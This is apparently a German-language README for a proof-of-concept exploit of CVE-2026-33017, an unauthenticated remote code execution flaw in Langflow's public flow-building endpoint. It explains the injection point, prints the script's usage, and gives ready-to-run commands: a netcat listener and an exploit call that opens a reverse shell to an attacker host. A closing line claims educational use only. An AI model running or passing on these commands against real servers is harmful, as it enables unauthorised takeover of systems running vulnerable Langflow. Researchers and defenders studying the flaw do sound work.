
CVE-2026-33017 Exploit | von infrar3d
xpl0ited von infrar3d
Dieses Proof-of-Concept-Exploit zielt auf eine kritische Remote Code Execution (RCE)-Schwachstelle in Langflow-Versionen vor 1.9.0 ab. Die Schwachstelle ermöglicht es nicht authentifizierten Angreifern, beliebige Systembefehle auszuführen, indem sie bösartigen Python-Code über den Flow-Building-API-Endpunkt einschleusen. Die Schwachstelle existiert im Endpunkt /api/v1/build_public_tmp/{flow_id}/flow, der benutzergelieferten Code im Code-Feld von Komponentenvorlagen nicht ordnungsgemäß bereinigt.
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help Hilfe anzeigen und beenden
-u, --url URL Ziel-Basis-URL
-f, --flow FLOW Flow-ID
-H, --host HOST Listener-Host für Reverse Shell
-P, --port PORT Listener-Port (Standard: 4444)
Das erste Terminal (Listener):
nc -lvnp 4444
Das zweite Terminal (Exploit):
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444
Diese Software und der Proof-of-Concept-Code werden ausschließlich für Bildungs- und Forschungszwecke bereitgestellt.
Sie sind für die Einhaltung aller geltenden Gesetze verantwortlich. Ethisch und verantwortungsbewusst nutzen.